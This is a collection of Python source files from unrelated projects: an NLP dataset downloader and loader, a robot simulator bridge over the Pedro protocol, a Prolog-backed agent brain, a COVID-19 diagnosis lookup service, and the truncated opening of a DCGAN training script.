os.path.join(DATA_PATH, name + '.csv') df.to_csv(file_paths[name]) file_paths[name] = normalize_ext_rename(file_paths[name]) return file_paths download = download_unzip def download_file(url, data_path=BIGDATA_PATH, filename=None, size=None, chunk_size=4096, normalize_filename=False, verbose=True): """Uses stream=True and a reasonable chunk size to be able to download large (GB) files over https Downloading this small file takes 1.5 sec. All subsequent "downloads" takes .6 sec to verify path and size. >>> import time >>> meta = BIG_URLS['ubuntu_dialog_test'] >>> pathend = os.path.join(*('nlpia/src/nlpia/bigdata/ubuntu_dialog_test.csv.gz'.split('/'))) >>> download_file(url=meta[0], verbose=False).endswith(pathend) True >>> t0 = time.time() >>> localpath = download_file(url=BIG_URLS['ubuntu_dialog_test'][0], verbose=False) >>> t1 = time.time() >>> localpath is None or ((0.015 < (t1 - t0) < 5.0) and localpath.endswith(pathend)) True >>> t0 = time.time() >>> download_file(url=meta[0], size=meta[1], verbose=False).endswith(pathend) True >>> time.time() - t0 < 0.02 True """ if isinstance(url, (list, tuple)): return [ download_file( s, data_path=data_path, filename=filename, size=size, chunk_size=chunk_size, verbose=verbose) for s in url] if url.endswith('dl=0'): url = url[:-1] + '1' # noninteractive Dropbox download remote_size = size # figure out what filename to expect after download and how big it should be if filename is None: filename = dropbox_basename(url) filepath = os.path.join(data_path, filename) if normalize_filename: filepath = normalize_filepath(filepath) log.info('expanded+normalized file path: {}'.format(filepath)) tqdm_prog = tqdm if verbose else no_tqdm log.info('requesting URL: {}'.format(url)) log.info('remote_size: {}'.format(remote_size)) stat = path_status(filepath) local_size = stat.get('size', None) log.info('local_size: {}'.format(local_size)) r = None if not remote_size or not stat['type'] == 'file' or not local_size >= remote_size or not stat['size'] > MIN_DATA_FILE_SIZE: try: r = requests_get(url, stream=True, allow_redirects=True, timeout=5) remote_size = r.headers.get('Content-Length', -1) except ConnectionError: log.error('ConnectionError for url: {} => request {}'.format(url, r)) remote_size = -1 if remote_size is None else remote_size except (InvalidURL, InvalidSchema, InvalidHeader, MissingSchema) as e: 
log.warning(e) log.warning('HTTP Error for url: {}\n request: {}\n traceback: {}'.format(url, r, format_exc())) log.warning('This can happen for Google Word Vector download links to Dropbox or Google Docs.') try: remote_size = int(remote_size) except ValueError: remote_size = -1 # remote_size has changed so need to check it again # TODO: check md5 or get the right size of remote file if stat['type'] == 'file' and local_size >= remote_size and stat['size'] > MIN_DATA_FILE_SIZE: r = r.close() if r else r log.info('retained: {}'.format(filepath)) return filepath filedir = os.path.dirname(filepath) created_dir = mkdir_p(filedir) log.info('data path created: {}'.format(created_dir)) assert os.path.isdir(filedir) assert created_dir.endswith(filedir) bytes_downloaded = 0 if r: log.info('downloading to: {}'.format(filepath)) with open(filepath, 'wb') as f: for chunk in tqdm_prog(r.iter_content(chunk_size=chunk_size), total=ceil(remote_size / float(chunk_size))): bytes_downloaded += len(chunk) if chunk: # filter out keep-alive chunks f.write(chunk) r.close() else: log.error(f'Unable to requests.get(url={url}) using request object {r}') return None log.debug('nlpia.loaders.download_file: bytes={}'.format(bytes_downloaded)) stat = path_status(filepath) log.info("local file stat {}".format(stat)) log.debug("filepath={}: local_size={}, remote_size={}, downloaded_bytes={}".format( filepath, size, remote_size, bytes_downloaded)) return filepath def download_name(name, verbose=True, **kwargs): meta = BIG_URLS[name] size = meta[1] or -1 url = meta[0] return download_file(url=url, size=size, verbose=verbose, normalize_filename=True, **kwargs) # for filename in meta['filenames'] def read_named_csv(name, data_path=DATA_PATH, nrows=None, verbose=True): """ Convert a dataset in a local file (usually a CSV) into a Pandas DataFrame TODO: should be called read_named_dataset Args: `name` is assumed not to have an extension (like ".csv"), alternative extensions are tried automatically.file """ print(f"Loading file with name: {name}") if os.path.isfile(name): try: return read_json(name) except (IOError, UnicodeDecodeError, json.JSONDecodeError): pass try: return read_csv(name, nrows=nrows) except (IOError, pd.errors.ParserError): pass try: return read_text(name, nrows=nrows) except (IOError, UnicodeDecodeError): pass data_path = expand_filepath(data_path) if os.path.isfile(os.path.join(data_path, name)): return read_csv(os.path.join(data_path, name), nrows=nrows) if name in DATASET_NAME2FILENAME: filename = DATASET_NAME2FILENAME[name] if filename.lower().endswith('.txt') or filename.lower().endswith('.txt.gz'): return read_text(os.path.join(data_path, filename), nrows=nrows) elif filename.lower().endswith('.bin.gz'): ipdb.set_trace() return KeyedVectors.load_word2vec_format(os.path.join(BIGDATA_PATH, name + '.bin.gz'), binary=True) try: return read_csv(os.path.join(data_path, name + '.csv.gz'), nrows=nrows) except IOError: pass try: return read_csv(os.path.join(data_path, name + '.csv'), nrows=nrows) except IOError: pass try: return read_json(os.path.join(data_path, name + '.json')) except IOError: pass try: return read_text(os.path.join(data_path, name + '.txt'), verbose=verbose) except IOError: pass # FIXME: mapping from short name to uncompressed filename # BIGDATA files are usually not loadable into dataframes filepath = os.path.join(BIGDATA_PATH, name + '.bin.gz') if os.path.isfile(filepath): try: ipdb.set_trace() return KeyedVectors.load_word2vec_format(filepath, binary=True) except ValueError: pass filepath = 
os.path.join(BIGDATA_PATH, name + '.txt') if os.path.isfile(filepath): return read_text(filepath, verbose=verbose) def get_data(name='sms-spam', nrows=None, limit=None): r""" Load data from a json, csv, or txt file if it exists in the data dir. References: [cities_air_pollution_index](https://www.numbeo.com/pollution/rankings.jsp) [cities](http://download.geonames.org/export/dump/cities.zip) [cities_us](http://download.geonames.org/export/dump/cities_us.zip) >>> from nlpia.data.loaders import get_data >>> words = get_data('words_ubuntu_us') >>> len(words) 99171 >>> list(words[:8]) ['A', "A's", "AA's", "AB's", "ABM's", "AC's", "ACTH's", "AI's"] >>> get_data('ubuntu_dialog_test').iloc[0] Context i think we could import the old comments via r... Utterance basically each xfree86 upload will NOT force u... Name: 0, dtype: object >>> df = get_data('imdb_test') >>> df.shape (20, 3) >>> df.columns Index(['url', 'rating', 'text'], dtype='object') >>> df.describe() rating count 20.000000 mean 5.450000 std 3.300319 min 1.000000 25% 3.000000 50% 5.500000 75% 8.250000 max 10.000000 """ nrows = nrows or limit if name in BIG_URLS: log.info('Downloading {}'.format(name)) filepaths = download_unzip(name, normalize_filenames=True) log.debug('nlpia.loaders.get_data.filepaths=' + str(filepaths)) filepath = filepaths[name][0] if isinstance(filepaths[name], (list, tuple)) else filepaths[name] log.debug('nlpia.loaders.get_data.filepath=' + str(filepath)) filepathlow = filepath.lower() if len(BIG_URLS[name]) >= 4: kwargs = BIG_URLS[name][4] if len(BIG_URLS[name]) >= 5 else {} return BIG_URLS[name][3](filepath, **kwargs) if filepathlow.endswith('.w2v.txt'): try: return KeyedVectors.load_word2vec_format(filepath, binary=False, limit=nrows) except (TypeError, UnicodeError): pass if filepathlow.endswith('.w2v.bin') or filepathlow.endswith('.bin.gz') or filepathlow.endswith('.w2v.bin.gz'): try: return KeyedVectors.load_word2vec_format(filepath, binary=True, limit=nrows) except (TypeError, UnicodeError): pass if filepathlow.endswith('.gz'): try: filepath = ensure_open(filepath) except: # noqa pass if re.match(r'.json([.][a-z]{0,3}){0,2}', filepathlow): return read_json(filepath) if filepathlow.endswith('.tsv.gz') or filepathlow.endswith('.tsv'): try: return pd.read_table(filepath) except: # noqa pass if filepathlow.endswith('.csv.gz') or filepathlow.endswith('.csv'): try: return read_csv(filepath) except: # noqa pass if filepathlow.endswith('.txt'): try: return read_text(filepath) except (TypeError, UnicodeError): pass return filepaths[name] elif name in DATASET_NAME2FILENAME: return read_named_csv(name, nrows=nrows) elif name in DATA_NAMES: return read_named_csv(DATA_NAMES[name], nrows=nrows) elif os.path.isfile(name): return read_named_csv(name, nrows=nrows) elif os.path.isfile(os.path.join(DATA_PATH, name)): return read_named_csv(os.path.join(DATA_PATH, name), nrows=nrows) msg = 'Unable to find dataset "{}"" in {} or {} (*.csv.gz, *.csv, *.json, *.zip, or *.txt)\n'.format( name, DATA_PATH, BIGDATA_PATH) msg += 'Available dataset names include:\n{}'.format('\n'.join(DATASET_NAMES)) log.error(msg) raise IOError(msg) def multifile_dataframe(paths=['urbanslang{}of4.csv'.format(i) for i in range(1, 5)], header=0, index_col=None): """Like pandas.read_csv, but loads and concatenates (df.append(df)s) DataFrames together""" df = pd.DataFrame() for p in paths: df = df.append(read_csv(p, header=header, index_col=index_col), ignore_index=True if not index_col else False) if index_col and df.index.name == index_col: del 
df[index_col] return df def get_wikidata_qnum(wikiarticle, wikisite): """Retrieve the Query number for a wikidata database of metadata about a particular article >>> print(get_wikidata_qnum(wikiarticle="Andromeda Galaxy", wikisite="enwiki")) Q2469 """ resp = requests_get('https://www.wikidata.org/w/api.php', timeout=5, params={ 'action': 'wbgetentities', 'titles': wikiarticle, 'sites': wikisite, 'props': '', 'format': 'json' }).json() return list(resp['entities'])[0] DATASET_FILENAMES = [f['name'] for f in find_files(DATA_PATH, ext='.csv.gz', level=0)] DATASET_FILENAMES += [f['name'] for f in find_files(DATA_PATH, ext='.csv', level=0)] DATASET_FILENAMES += [f['name'] for f in find_files(DATA_PATH, ext='.json', level=0)] DATASET_FILENAMES += [f['name'] for f in find_files(DATA_PATH, ext='.txt', level=0)] DATASET_NAMES = [ f[:-4] if f.endswith('.csv') else f for f in [os.path.splitext(f)[0] for f in DATASET_FILENAMES]] DATASET_NAME2FILENAME = dict(sorted(zip(DATASET_NAMES, DATASET_FILENAMES))) def str2int(s): s = ''.join(c for c in s if c in '0123456789') return int(s or INT_MIN) def clean_toxoplasmosis(url='http://www.rightdiagnosis.com/t/toxoplasmosis/stats-country.htm'): dfs = pd.read_html('http://www.rightdiagnosis.com/t/toxoplasmosis/stats-country.htm', header=0) df = dfs[0].copy() df.columns = normalize_column_names(df.columns) df = df.dropna().copy() df['extrapolated_prevalence'] = df['extrapolated_prevalence'].apply(str2int) df['population_estimated_used'] = df['population_estimated_used'].apply(str2int) df['frequency'] = df.extrapolated_prevalence.astype(float) / df.population_estimated_used return df def normalize_column_names(df): r""" Clean up whitespace in column names. See better version at `pugnlp.clean_columns` >>> df = pd.DataFrame([[1, 2], [3, 4]], columns=['Hello World', 'not here']) >>> normalize_column_names(df) ['hello_world', 'not_here'] """ columns = df.columns if hasattr(df, 'columns') else df columns = [c.lower().replace(' ', '_') for c in columns] return columns def clean_column_values(df, inplace=True): r""" Convert dollar value strings, numbers with commas, and percents into floating point values >>> df = get_data('us_gov_deficits_raw') >>> df2 = clean_column_values(df, inplace=False) >>> df2.iloc[0] Fiscal year 10/2017-3/2018 President's party R Senate majority party R House majority party R Top-bracket marginal income tax rate 38.3 National debt millions 2.10896e+07 National debt millions of 1983 dollars 8.47004e+06 Deficit\n(millions of 1983 dollars) 431443 Surplus string in 1983 dollars NaN Deficit string in 1983 dollars ($ = $10B) $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Net surplus in 1983 dollars ($B) -430 Name: 0, dtype: object """ dollars_percents = re.compile(r'[%$,;\s]+') if not inplace: df = df.copy() for c in df.columns: values = None if df[c].dtype.char in '<U S O'.split(): try: values = df[c].copy() values = values.fillna('') values = values.astype(str).str.replace(dollars_percents, '') # values = values.str.strip().str.replace(dollars_percents, '').str.strip() if values.str.len().sum() > .2 * df[c].astype(str).str.len().sum(): values[values.isnull()] = np.nan values[values == ''] = np.nan values = values.astype(float) except ValueError: values = None except: # noqa log.error('Error on column {} with dtype {}'.format(c, df[c].dtype)) raise if values is not None: if values.isnull().sum() < .6 * len(values) and values.any(): df[c] = values return df def load_geonames(filepath='http://download.geonames.org/export/dump/cities1000.zip'): """Clean the 
table of city metadata from download.geoname.org/export/dump/{filename} Reference: http://download.geonames.org/export/dump/readme.txt 'cities1000.txt' and 'allCountries.txt' have the following tab-separated fields: 0 geonameid : integer id of record in geonames database 1 name : name of geographical point (utf8) varchar(200) 2 asciiname : name of geographical point in plain ascii characters, varchar(200) 3 alternatenames : alternatenames, comma separated, ascii names automatically transliterated, convenience attribute from alternatename table, varchar(10000) 4 latitude : latitude in decimal degrees (wgs84) 5 longitude : longitude in decimal degrees (wgs84) 6 feature class : see http://www.geonames.org/export/codes.html, char(1) 7 feature code : see http://www.geonames.org/export/codes.html, varchar(10) 8 country code : ISO-3166 2-letter country code, 2 characters 9 cc2 : alternate country codes, comma separated, ISO-3166 2-letter country code, 200 characters 10 admin1 code : fipscode (subject to change to iso code), see exceptions below, see file admin1Codes.txt for display names of this code; varchar(20) 11 admin2 code : code for the second administrative division, a county in the US, see file admin2Codes.txt; varchar(80) 12 admin3 code : code for third level administrative division, varchar(20) 13 admin4 code : code for fourth level administrative division, varchar(20) 14 population : bigint (8 byte int) 15 elevation : in meters, integer 16 dem : digital elevation model, srtm3 or gtopo30, average elevation of (3''x3''ca 90mx90m) or 30''x30''(ca 900mx900m) area in meters, integer. srtm processed by cgiar/ciat. 17 timezone : the iana timezone id (see file timeZone.txt) varchar(40) 18 modification date : date of last modification in yyyy-MM-dd format """ columns = ['geonameid', 'name', 'asciiname', 'alternatenames', 'latitude', 'longitude', 'feature class', 'feature code', 'country code'] columns += ['cc2', 'admin1_code', 'admin2_code', 'admin3_code', 'admin4_code', 'population', 'elevation', 'dem', 'timezone', 'modification date'] columns = normalize_column_names(columns) df = pd.read_csv(filepath, sep='\t', index_col=None, low_memory=False, header=None) df.columns = columns return df def load_geo_adwords(filename='AdWords API Location Criteria 2017-06-26.csv.gz'): """ WARN: Not a good source of city names. 
This table has many errors, even after cleaning""" df = pd.read_csv(filename, header=0, index_col=0, low_memory=False) df.columns = [c.replace(' ', '_').lower() for c in df.columns] canonical = pd.DataFrame([list(row) for row in df.canonical_name.str.split(',').values]) def cleaner(row): cleaned = np.array( [s for i, s in enumerate(row.values) if s not in ('Downtown', None) and (i > 3 or row[i + 1] != s)]) if len(cleaned) == 2: cleaned = [cleaned[0], None, cleaned[1], None, None] else: cleaned = list(cleaned) + [None] * (5 - len(cleaned)) if not np.all(np.array(row.values)[:3] == np.array(cleaned)[:3]): log.info('{} => {}'.format(row.values, cleaned)) return list(cleaned) cleancanon = canonical.apply(cleaner, axis=1) cleancanon.columns = 'city region country extra extra2'.split() df['region'] = cleancanon.region df['country'] = cleancanon.country return df def clean_cornell_movies(filename='cornell_movie_dialogs_corpus.zip', subdir='cornell movie-dialogs corpus'): """ Load a dataframe of ~100k raw (uncollated) movie lines from the cornell movies dialog corpus >>> local_filepath = download_file(BIG_URLS['cornell_movie_dialogs_corpus'][0]) >>> df = clean_cornell_movies(filename='cornell_movie_dialogs_corpus.zip') >>> df.describe(include='all') user movie person utterance count 304713 304713 304713 304446 unique 9035 617 5356 265783 top u4525 m289 JACK What? freq 537 1530 3032 1684 """ fullpath_zipfile = find_filepath(filename) dirname = os.path.basename(filename) subdir = 'cornell movie-dialogs corpus' if fullpath_zipfile.lower().endswith('.zip'): retval = unzip(fullpath_zipfile) log.debug(f'unzip({fullpath_zipfile}) return value: {retval}') dirname = dirname[:-4] fullpath_movie_lines = os.path.join(BIGDATA_PATH, dirname, subdir, 'movie_lines.txt') dialog = pd.read_csv( fullpath_movie_lines, sep=r'\+\+\+\$\+\+\+', engine='python', header=None, index_col=0) dialog.columns = 'user movie person utterance'.split() dialog.index.name = 'line' dialog.index = [int(s.strip()[1:]) for s in dialog.index.values] dialog.sort_index(inplace=True) for col in dialog.columns: dialog[col] = dialog[col].str.strip() return dialog def isglove(filepath): """ Get the first word vector in a GloVE file and return its dimensionality or False if not a vector >>> isglove(os.path.join(DATA_PATH, 'cats_and_dogs.txt')) False """ with ensure_open(filepath, 'r') as f: header_line = f.readline() vector_line = f.readline() try: num_vectors, num_dim = header_line.split() return int(num_dim) except (ValueError, TypeError): pass vector = vector_line.split()[1:] if len(vector) % 10: print(vector) print(len(vector) % 10) return False try: vector = np.array([float(x) for x in vector]) except (ValueError, TypeError): return False if np.all(np.abs(vector) < 12.): return len(vector) return False def nlp(texts, lang='en', linesep=None, verbose=True): r""" Use the SpaCy parser to parse and tag natural language strings. Load the SpaCy parser language model lazily and share it among all nlpia modules. Probably unnecessary, since SpaCy probably takes care of this with `spacy.load()` >>> doc = nlp("Domo arigatto Mr. Roboto.") >>> doc.text 'Domo arigatto Mr. Roboto.' >>> doc.ents (Roboto,) >>> docs = nlp("Hey Mr. Tangerine Man!\nPlay a song for me.\n", linesep='\n') >>> doc = docs[0] >>> [t for t in doc] [Hey, Mr., Tangerine, Man, !] 
>>> [tok.text for tok in doc] ['Hey', 'Mr.', 'Tangerine', 'Man', '!'] >>> [(tok.text, tok.tag_) for tok in doc] [('Hey', 'UH'), ('Mr.', 'NNP'), ('Tangerine', 'NNP'), ('Man', 'NNP'), ('!', '.')] >>> [(ent.text, ent.ent_id, ent.has_vector, ent.vector[:3].round(3)) for ent in doc.ents] [('Tangerine', 0, True, array([0.678, 0.134, 2.162], dtype=float32))] """ # doesn't let you load a different model anywhere else in the module linesep = os.linesep if linesep in ('default', True, 1, 'os') else linesep tqdm_prog = no_tqdm if (not verbose or (hasattr(texts, '__len__') and len(texts) < 3)) else tqdm global _parse if not _parse: try: _parse = spacy.load(lang) except (OSError, IOError): try: spacy.cli.download(lang) except URLError: log.warning("Unable to download Spacy language model '{}' so nlp(text) just returns text.split()".format(lang)) parse = _parse or str.split # TODO: reverse this recursion (str first then sequence) to allow for sequences of sequences of texts if isinstance(texts, str): if linesep: return nlp(texts.split(linesep)) else: return nlp([texts]) if hasattr(texts, '__len__'): if len(texts) == 1: return parse(texts[0]) elif len(texts) > 1: return [(parse or str.split)(text) for text in tqdm_prog(texts)] else: return None else: # return generator if sequence of strings doesn't have __len__ which means its an iterable or generator itself return (parse(text) for text in tqdm_prog(texts)) # TODO: return the same type as the input, e.g. `type(texts)(texts)` def clean_win_tsv(filepath=os.path.join(DATA_PATH, 'Products.txt'), index_col=False, sep='\t', lineterminator='\r', error_bad_lines=False, **kwargs): """ Load and clean tab-separated files saved on Windows OS ('\r\n') """ df = pd.read_csv(filepath, index_col=index_col, sep=sep, lineterminator=lineterminator, error_bad_lines=error_bad_lines, **kwargs) index_col = df.columns[0] original_len = len(df) if df[index_col].values[-1] == '\n': df.iloc[-1, 0] = np.nan original_len = len(df) - 1 df.dropna(how='all', inplace=True) df[index_col] = df[index_col].str.strip().apply(lambda x: x if x else str(INT_MIN)).astype(int) df = df[~(df[index_col] == INT_NAN)] df.set_index(index_col, inplace=True) if len(df) != original_len: log.warning(('Loaded {} rows from tsv. Original file, "{}", contained {} seemingly valid lines.' + 'Index column: {}').format(len(df), original_len, filepath, index_col)) return df ```
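A minimal usage sketch of the column-cleaning helpers defined above (`normalize_column_names`, `clean_column_values`, `str2int`); the import path `loaders` is only an assumption for illustration, since the actual module name is not shown in this record.

```python
# Usage sketch; `loaders` is a hypothetical module name for the file above.
import pandas as pd
from loaders import normalize_column_names, clean_column_values, str2int

df = pd.DataFrame([["$1,200", "3%"], ["$800", "7%"]],
                  columns=["Total Cost ", " Growth Rate"])

# Lower-case the headers and replace spaces with underscores.
df.columns = normalize_column_names(df)        # ['total_cost_', '_growth_rate']

# Strip $, %, commas and whitespace, then coerce mostly-numeric columns to float.
df = clean_column_values(df, inplace=False)

# Keep only the digits of a messy string (empty strings fall back to INT_MIN).
print(str2int("1,234 people"))                 # 1234
```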
{ "source": "AAAI-DISIM-UnivAQ/pedro_c-sim_bridge", "score": 3 }
#### File: pedro_c-sim_bridge/RobotControl/pedro_controller.py ```python from pedroclient import * import time # Handling messages from the TR program class MessageThread(threading.Thread): def __init__(self, client, q): self.running = True self.client = client self.queue = q threading.Thread.__init__(self) self.daemon = True def run(self): while self.running: p2pmsg = self.client.get_term()[0] self.queue.put(p2pmsg) def stop(self): self.running = False class Vrep_Pedro(object): # sensors: # sonar( Ld, Rd) # # motion: # move_forward(speed) # stop() # turnLeft(angleSpeed) # turnRight(angleSpeed) def __init__(self, vrep_client_id): self.vrep_client_id = vrep_client_id self.tr_client_addr = None self.client = PedroClient() # register vrep_pedro as the name of this process with Pedro self.client.register("robot_sim") self.queue = queue.Queue(0) self.message_thread = MessageThread(self.client, self.queue) self.message_thread.start() self.set_client("['127.0.0.1']") # def methods for sensing and acting to the robot in the simulator def move_forward(self, speed): print("move_forward", speed) self.vrep_client_id.move_forward(speed) def stop_move(self): print("stop") self.vrep_client_id.move_forward(0.0) def turn_left(self, angleSpeed): self.vrep_client_id.rotate_left(angleSpeed) def turn_right(self, angleSpeed): self.vrep_client_id.rotate_right(angleSpeed) def set_client(self, addr): self.tr_client_addr = addr def send_percept(self, percepts_string): print("send_percept", str(self.tr_client_addr), percepts_string) if self.client.p2p(self.tr_client_addr, percepts_string) == 0: print("Error", percepts_string) def exit(self): self.message_thread.stop() self.client.p2p("messages:" + self.tr_client_addr, "quiting") def process_initialize(self): # Block unitil message arrives print('listening start signal..') p2pmsg = self.queue.get() print(p2pmsg) message = p2pmsg.args[2] if str(message) == 'initialise_': # get the sender address percepts_addr = p2pmsg.args[1] print("percepts_addr", str(percepts_addr)) self.set_client(percepts_addr) # VREP code goes here so the visualization can # send back any initial percepts (iniital state) # create a string representing a list of initial percepts # say init_percepts and call # self.parent.send_percept(init_percepts) init_percepts = '[]' self.send_percept(init_percepts) else: print("Didn't get initialise_ message") def process_controls(self): while not self.queue.empty(): p2pmsg = self.queue.get() msg = p2pmsg.args[2] print("process_controls message: ", str(msg)) if not msg.is_pstruct() or msg.functor.val != 'controls': print("CONTROLS: ", str(msg)) assert False actions = msg.args[0] if not actions.is_plist(): print("CONTROLS: ", str(actions)) assert False for a in actions.toList(): self.process_action(a) def process_action(self, message): if not message.is_pstruct(): return functor = message.functor if not functor.is_patom(): return cmd_type = functor.val cmd = message.args[0] if not cmd.is_pstruct(): return if cmd_type == 'stop_': if cmd.functor.val == 'move' and cmd.arity() == 2: self.stop_move() elif cmd_type in ['start_', 'mod_']: if cmd.functor.val == 'move' and cmd.arity() == 1: speed = cmd.args[0].val self.move_forward(speed) if cmd.functor.val == 'turn_left' and cmd.arity() == 1: speed = cmd.args[0].val self.turn_left(speed) if cmd.functor.val == 'turn_right' and cmd.arity() == 1: speed = cmd.args[0].val self.turn_right(speed) ```
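A sketch of how the bridge above could be driven from a top-level loop. `SimRobot` is a stand-in for the simulator client passed in as `vrep_client_id`, the sonar percept string is an assumed format based on the comment in `Vrep_Pedro`, and a Pedro server must already be running for `PedroClient` to connect.

```python
# Hypothetical wiring of the Vrep_Pedro bridge above; assumes a running Pedro server
# and a teleo-reactive program that sends the initialise_ message and control terms.
import time

class SimRobot:
    """Stand-in for the simulator client; only the methods Vrep_Pedro calls."""
    def move_forward(self, speed): print("sim: forward", speed)
    def rotate_left(self, angle_speed): print("sim: left", angle_speed)
    def rotate_right(self, angle_speed): print("sim: right", angle_speed)

def main():
    bridge = Vrep_Pedro(SimRobot())
    bridge.process_initialize()                    # block until initialise_ arrives
    try:
        while True:
            bridge.process_controls()              # apply queued start_/stop_/mod_ commands
            bridge.send_percept("[sonar(1.0, 1.0)]")   # percept format is an assumption
            time.sleep(0.1)
    finally:
        bridge.exit()

if __name__ == "__main__":
    main()
```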
{ "source": "AAAI-DISIM-UnivAQ/prothonics", "score": 2 }
#### File: prothonics/brain/__init__.py ```python from pyswip import Prolog import prothonics.brain.learning import prothonics.brain.memory import prothonics.brain.behaviour class Brain: ''' The main intelligent controller of the Prothonics Agent. ''' __learning = None __memory = None __behaviour = None __prologEngine = None # Prolog engine, reasoning and learning core def __init__(self, decisionsLen, factsLen): self.__prologEngine = Prolog() # The engine given by Pyswip SWI Prolog library self.__learning = learning.Learning(self.__prologEngine) self.__memory = memory.Memory(decisionsLen, factsLen) self.__behaviour = behaviour.Behaviour(self.__prologEngine) def useLearning(self): return self.__learning def useMemory(self): return self.__memory def useBehaviour(self): return self.__behaviour def reactTo(self, fact, decisionFactClass): ''' Learns a new fact and take a decision about it. It stores in memory the new fact and the new decision. :param fact: the new fact to learn, it's a string. :param decisionFactClass: the class of the fact that describes the solution. :return: ''' fact = str(fact) decisionFactClass = str(decisionFactClass) self.__learning.learnNewFact(fact) self.__memory.putNewFact(fact) newDecision = self.__behaviour.takeDecision(decisionFactClass=decisionFactClass, singleOut=True) if newDecision: self.__memory.putNewDecision(newDecision) return ``` #### File: brain/learning/__init__.py ```python class Learning: ''' The learning module of a Prothinics Agent Brain. ''' __prologEngine = None # Prolog Engine, reasoning and learning core def __init__(self, prologEngine): self.__prologEngine = prologEngine def cleanIdeas(self, aboutFact): ''' Deletes old facts from Prolog Engine. :param aboutFact: fact class that has to be cleaned. :return: ''' aboutFact = str(aboutFact) factClass = aboutFact.split('(')[0] + '(_)' self.__prologEngine.retractall(factClass) return def learnKnoledgeBaseFromFile(self, prologFilePath): ''' Learns from a SWI Prolog file. :param prologFilePath: The path of the Prolog (.pl or .txt) file we need to use. :return: ''' assert isinstance(prologFilePath, str) self.__prologEngine.consult(prologFilePath) return def learnNewFact(self, fact): ''' Asserts a new fact. :param fact: a string containing a Prolog fact. :return: ''' fact = str(fact).replace('"', "'") self.cleanIdeas(fact) self.__prologEngine.assertz(fact) return ```
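A short sketch of the intended call pattern for `Brain`; the rule file name, the example rule and the fact strings are illustrative only, and the knowledge-base loader keeps its original (misspelled) method name `learnKnoledgeBaseFromFile`.

```python
# Illustrative only: the Prolog file and facts below are not part of the project.
from prothonics.brain import Brain

brain = Brain(decisionsLen=10, factsLen=10)

# Load SWI-Prolog behaviour rules, e.g. a file containing:
#   decision(turn_left) :- obstacle(right).
brain.useLearning().learnKnoledgeBaseFromFile("rules.pl")

# Assert a new percept; Brain retracts older facts of the same class, asserts the
# new one, queries the behaviour module and stores both fact and decision in Memory.
brain.reactTo("obstacle(right)", "decision")
```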
{ "source": "aaaimx/covid19-assistant-api", "score": 3 }
#### File: covid19-assistant-api/main/diagnosis.py ```python import numpy as np import os from django.conf import settings diseases = ['', 'ALERGIA', 'COVID-19', 'INFECCIÓN RESPIRATORIA', 'RESFRIADO'] # Answer vector received from the frontend values = [4, 1, 1, 1, 1, 1, 1, 1, 4, 4, 1] def get_diagnosis(values): """ Get Diagnosis of diseases given an array of values :args: values: list() An array of 11 integers :returns: hiper[pos]: an integer as diagnostic """ # Compute which element to read, based on the answer vector values = np.array(values) t = np.linspace(36,40,4) q = np.linspace(0,10,4) cuatros = np.zeros((11)) for i in range(11): cuatros[i] = 4 ** (10 - i) # Index of the element to read from the file pos = int(sum((values - 1) * cuatros) + 1) - 1 # Read the file with open(os.path.join(settings.BASE_DIR, 'main/hiper.txt'), 'r') as fid: hiper = fid.read() fid.close() # Diagnosis d = int(hiper[pos]) return d, diseases[d] ``` #### File: covid19-assistant-api/main/tasks.py ```python from random import random # project imports from .models import * # celery imports from celery.decorators import task from celery.task.schedules import crontab from celery.decorators import periodic_task import socketio def send_message(event, data): """ Connect to the socket and send messages """ sio = socketio.Client() try: sio.connect('http://0.0.0.0:8000', namespaces=['/tasks']) except: sio.disconnect() finally: sio.emit(event, data, namespace="/tasks") # =================================================== # Tasks # =================================================== ``` #### File: covid19-assistant-api/project/socket_app.py ```python from django.conf import settings from random import random import socketio import os sio = socketio.Server(async_mode='eventlet', cors_allowed_origins="*") if not settings.ENV == 'development': # in development the socket.io server has to be run # here because the files change (auto-reload) from project.wsgi import sio # =================================================== # Clients # =================================================== # Namespace for Celery tasks @sio.on('connect', namespace='/tasks') def connect(sid, environ): """ Listens for connections on a channel """ print("connect for tasks: ", sid) # Listening on namespace @sio.on('book',namespace='/tasks') def metrics(sid, book): """ Sends an alert about new books """ # emit messages sio.emit('chat message', book, namespace='/client') print("message ", book) # =================================================== # Disconnections # =================================================== @sio.on('disconnect') def disconnect(sid): """ Listens for disconnections on all channels """ print('disconnect ', sid) ```
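The index arithmetic in `get_diagnosis` treats the 11 answers (each coded 1 to 4) as the digits of a base-4 number; the `t` and `q` linspace arrays are computed but never used. A standalone recomputation of the lookup offset, without Django or `hiper.txt`:

```python
import numpy as np

values = np.array([4, 1, 1, 1, 1, 1, 1, 1, 4, 4, 1])   # 11 answers coded 1..4
weights = 4 ** np.arange(10, -1, -1)                    # 4**10, 4**9, ..., 4**0

# Shift the answers to 0..3 and read them as an 11-digit base-4 number.
pos = int(np.sum((values - 1) * weights))               # 0-based offset into hiper.txt
print(pos)                                              # 3145788

# get_diagnosis reads the single digit at this offset and maps it through `diseases`.
```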
{ "source": "aaajiao/typeface", "score": 2 }
#### File: dcgan_code_mod/HITOR3C/train.py ```python import sys sys.path.append('..') import os import json from time import time import numpy as np from tqdm import tqdm #from matplotlib import pyplot as plt from sklearn.externals import joblib from itertools import izip import theano import theano.tensor as T from theano.sandbox.cuda.dnn import dnn_conv from lib import activations from lib import updates from lib import inits from lib.vis import grayscale_grid_vis from lib.rng import py_rng, np_rng from lib.ops import batchnorm, conv_cond_concat, deconv, dropout from lib.theano_utils import floatX, sharedX from lib.data_utils import OneHot, shuffle, iter_data from lib.metrics import nnc_score, nnd_score from load import get_hitor3c # parameters npx = 112 # pixels width/height of images npy = 112 ny = 10 # num classes force_include_classes = [] ### learning parameters k = 1 # num of discrim updates for each gen update l2 = 2.5e-5 # l2 weight decay b1 = 0.5 # momentum term of adam nc = 1 # num of channels in image nbatch = 128 # num of examples in batch nz = 100 # num of dim for Z ngfc = 1024 # num of gen units for fully connected layers ndfc = 1024 # num of discrim units for fully connected layers ngf = 64 # num of gen filters in first conv layer ndf = 64 # num of discrim filters in first conv layer nx = npx*npy*nc # num of dimensions in X niter = 100 # num of iter at starting learning rate niter_decay = 401 # num of iter to linearly decay learning rate to zero lr = 0.00022 # initial learning rate for adam # load data trX, vaX, teX, trY, vaY, teY, ny = get_hitor3c(ny, npx, npy, force_include_classes) vaX = floatX(vaX)/255. ntrain, nval, ntest = len(trX), len(vaX), len(teX) print "size of training set: %d" % len(trX) def transform(X): return (floatX(X)/255.).reshape(-1, nc, npx, npy) def inverse_transform(X): X = 